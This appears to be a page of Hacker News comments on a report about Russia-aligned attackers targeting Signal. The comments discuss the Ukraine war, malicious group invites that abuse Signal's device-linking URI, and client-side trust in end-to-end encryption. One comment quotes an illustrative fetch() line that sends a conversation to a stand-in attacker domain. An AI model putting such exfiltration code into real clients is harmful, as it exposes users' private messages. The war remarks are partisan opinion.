Live data from Hacker News

Multiple Russia-aligned threat actors actively targeting Signal Messenger

cloud.google.com

301–310 of 329 posts

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#302

Earlier quoted context omitted.

> I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.

This meatwave meme needs to die. Again ,if Ukrainians are being beaten by guy in crutches,it says so much about this NATO armed and trained force

I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#303
post #105

Earlier quoted context omitted.

Russians aren't allowed to bring phones on the frontlines apparently but Ukranians often do still as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. Beyond the donation incentive they attached to videos when publishing them on Youtube/Telegram.

> I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.

[flagged]

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#305

One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rende…

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#308

> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792. Missing from their recommendations: Install No Script:…

No Script is a browser extension. Signal is an Android/Ios/Electron app so no

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#309

“Russia's re-invasion of Ukraine” Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

Invasion of Crimea 2014

Re-invasion in February 2022

Post reply on HN